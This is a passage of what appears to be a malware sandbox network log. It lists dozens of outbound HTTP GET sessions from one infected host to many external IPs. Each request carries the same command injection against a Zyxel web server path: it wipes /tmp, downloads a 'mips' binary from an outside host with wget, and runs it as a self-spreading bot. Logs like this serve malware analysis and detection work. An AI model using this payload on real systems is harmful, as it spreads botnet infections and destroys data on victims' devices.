                              2963192.168.2.133728896.248.213.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680278063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2964192.168.2.1333456112.241.95.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680320024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2965192.168.2.1348012186.123.6.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680356026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2966192.168.2.1340736181.143.5.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680418968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2967192.168.2.1348280147.26.39.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680454969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2968192.168.2.133352413.252.180.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680483103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2969192.168.2.135405672.250.49.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680536032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2970192.168.2.1354984132.180.21.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680603027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2971192.168.2.134799232.159.14.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680639029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2972192.168.2.134030836.204.227.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680685043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2973192.168.2.135082087.126.98.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680722952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2974192.168.2.1359490179.43.149.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680782080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2975192.168.2.133306423.206.89.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680825949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2976192.168.2.133821412.255.250.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680864096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2977192.168.2.135277062.228.214.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680902004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2978192.168.2.135409257.181.144.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680918932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2979192.168.2.1340158124.131.84.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680969000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2980192.168.2.133775047.81.52.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680991888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2981192.168.2.135321647.12.241.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681030989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2982192.168.2.133286239.109.214.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681041002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2983192.168.2.1342730161.185.127.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681111097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2984192.168.2.1355896100.134.186.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681143999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2985192.168.2.1339380146.115.174.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681204081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2986192.168.2.134181489.229.184.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681240082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2987192.168.2.1342296223.197.142.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681272984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2988192.168.2.1336504168.246.47.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681302071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2989192.168.2.1352512171.220.23.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681349039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2990192.168.2.1352604147.195.129.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681411982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2991192.168.2.134130295.111.128.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681444883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2992192.168.2.133704038.203.72.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681489944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2993192.168.2.1338076173.119.215.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681539059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2994192.168.2.1350350203.121.198.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681579113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2995192.168.2.134532257.158.35.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681636095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2996192.168.2.1336892168.138.192.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681674004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2997192.168.2.1333732115.5.160.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681731939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2998192.168.2.135733639.35.232.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681790113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2999192.168.2.1337264216.115.9.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681840897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3000192.168.2.1356930147.134.117.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681879997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3001192.168.2.135096212.62.116.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681926966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3002192.168.2.1358490104.99.131.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681963921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3003192.168.2.135196049.183.74.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.681999922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3004192.168.2.135103637.182.108.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682064056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3005192.168.2.134552065.208.194.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682096958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3006192.168.2.135025896.203.193.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682131052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3007192.168.2.1352710182.175.76.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682174921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3008192.168.2.1342758134.188.105.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682184935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3009192.168.2.1348652198.76.123.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682224035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3010192.168.2.133729042.174.72.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682236910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3011192.168.2.1347094145.161.225.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682271957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3012192.168.2.1338510179.140.127.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682356119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3013192.168.2.13535324.105.12.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682406902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3014192.168.2.1346944103.162.62.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682424068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3015192.168.2.1337032150.131.48.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682476044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3016192.168.2.1339636143.6.2.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682532072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3017192.168.2.133559069.22.59.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682545900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3018192.168.2.1341384157.40.142.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682611942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3019192.168.2.1337994171.103.116.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682641983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3020192.168.2.133513027.177.87.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682674885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3021192.168.2.1348474116.88.170.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682696104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3022192.168.2.1341350137.122.198.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682761908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3023192.168.2.1351476141.98.59.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682784081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3024192.168.2.1350218138.52.44.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682812929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3025192.168.2.1343112203.90.7.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682887077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3026192.168.2.1357876101.34.13.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682918072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3027192.168.2.1347318100.135.76.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682949066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3028192.168.2.1354850148.2.127.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.682996988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3029192.168.2.1334750114.221.101.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683027983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3030192.168.2.1343256174.34.44.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683064938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3031192.168.2.134176634.206.164.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683109999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3032192.168.2.133367466.109.146.30443
                              TimestampBytes transferredDirectionData
